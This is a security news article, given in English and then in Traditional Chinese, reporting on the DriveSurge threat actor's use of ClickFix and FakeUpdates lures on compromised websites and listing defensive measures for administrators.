Security researchers have identified a threat actor operating under the name DriveSurge that has compromised thousands of websites to distribute malware through two distinct attack techniques — ClickFix and FakeUpdates — in what analysts describe as a notable convergence of campaigns that are more commonly tracked in isolation.
According to a report published by BleepingComputer, the operation deploys both attack methods at a large scale across hijacked sites, leveraging the reach of legitimate but compromised web properties to lure victims into executing malicious payloads.
Two Attack Chains, One Operator
ClickFix and FakeUpdates are both well-known social engineering techniques that trick users into interacting with deceptive browser overlays or fake update prompts. Historically, security teams have observed them deployed by different groups in separate campaigns. DriveSurge's decision to bundle both into a shared infrastructure marks an operational maturity that defenders say warrants close attention.
ClickFix, in particular, has seen rapid adoption across the threat landscape in recent months. The technique typically presents users with a fake error or verification prompt, coaxing them into copying and pasting a malicious command into their system — often a PowerShell script that downloads and executes further malware. FakeUpdates, meanwhile, relies on convincing browser update notifications to trick users into running trojanised installers.
By running both techniques simultaneously across a network of compromised sites, DriveSurge maximises its chances of success across different user behaviours and browser environments.
Why This Matters
The convergence of two separately tracked attack techniques under a single operator illustrates a broader trend in the cybercriminal ecosystem: consolidation. Rather than specialising in one method, well-resourced actors are building multi-vector campaigns that are harder for defenders to attribute and disrupt.
For IT administrators and security teams, the DriveSurge campaign underscores the importance of monitoring web assets for injected scripts and suspicious redirects. Compromised legitimate sites remain one of the most effective delivery mechanisms for social engineering attacks, precisely because users trust the domains they visit.
Defensive Considerations
Organisations looking to protect against campaigns like DriveSurge's should consider the following measures:
- Monitor for unauthorised script injections on web properties, particularly JavaScript that loads external resources or renders overlay elements.
- Educate end users about browser-based social engineering tactics, including fake error messages and unsolicited update prompts.
- Implement Content Security Policy (CSP) headers to restrict which external scripts can execute on corporate or hosted websites.
- Deploy endpoint detection tools capable of identifying suspicious command-line activity, especially PowerShell invocations originating from browser processes.
The discovery of DriveSurge's dual-technique infrastructure serves as a reminder that the threat landscape continues to consolidate around social engineering as a primary initial access vector. As attackers refine their toolkits and combine methods, defenders must adapt their monitoring and awareness strategies accordingly.
安全研究人員識別出一個以「DriveSurge」為名運作的威脅行為者,該行為者已入侵數千個網站,透過兩種截然不同的攻擊技術——ClickFix 和 FakeUpdates——來分發惡意軟件。分析師指出,這是一個值得注意的活動整合,而這些活動通常被獨立追蹤。
根據 BleepingComputer 發布的報告,此行動在受劫持的網站上大規模部署這兩種攻擊方法,利用被入侵但本身合法的網站的影響力,引誘受害者執行惡意負載。
兩條攻擊鏈,一個操作者
ClickFix 和 FakeUpdates 都是眾所周知的社會工程技術,它們誘騙使用者與欺騙性的瀏覽器覆蓋層或虛假的更新提示進行互動。歷史上,安全團隊觀察到它們是由不同團體在各自的活動中部署的。DriveSurge 決定將兩者捆綁到一個共享基礎設施中,標誌著一種操作上的成熟,防禦者認為這值得密切關注。
特別是 ClickFix,在近幾個月的威脅格局中被迅速採用。該技術通常會向使用者呈現一個虛假的錯誤或驗證提示,誘使他們將惡意命令複製並貼上到系統中——通常是一個用於下載並執行後續惡意軟件的 PowerShell 腳本。另一方面,FakeUpdates 則依賴令人信服的瀏覽器更新通知,誘騙使用者執行被植入木馬的安裝程式。
透過在一個受入侵的網站網絡中同時運行這兩種技術,DriveSurge 最大限度地提高了在不同使用者行為和瀏覽器環境中成功的機會。
為何這很重要
兩種被獨立追蹤的攻擊技術在單一操作者下匯聚,說明了網絡犯罪生態系統的一個更廣泛趨勢:整合。資源充足的行為者不再專精於單一方法,而是建立多向量的攻擊活動,這使得防禦者更難進行歸因和破壞。
對於IT管理員和安全團隊而言,DriveSurge 攻擊活動凸顯了監控網站資產以發現被注入的腳本和可疑重定向的重要性。被入侵的合法網站仍然是社會工程攻擊最有效的傳遞機制之一,這恰恰是因為使用者信任他們所訪問的域名。
防禦考量
希望防禦類似 DriveSurge 攻擊活動的組織應考慮以下措施:
- 監控未經授權的腳本注入,特別是在網站資產上,尤其是那些載入外部資源或渲染覆蓋層元素的 JavaScript。
- 教育最終使用者關於基於瀏覽器的社會工程策略,包括虛假錯誤訊息和非預期的更新提示。
- 實施內容安全策略(CSP)header,以限制哪些外部腳本可以在企業或託管的網站上執行。
- 部署端點偵測工具,使其能夠識別可疑的指令列活動,特別是源自瀏覽器程序的 PowerShell 調用。
DriveSurge 雙重技術基礎設施的發現提醒我們,威脅格局持續圍繞社會工程作為主要初始存取向量進行整合。隨著攻擊者改進其工具組合併結合各種方法,防禦者必須相應地調整其監控和意識策略。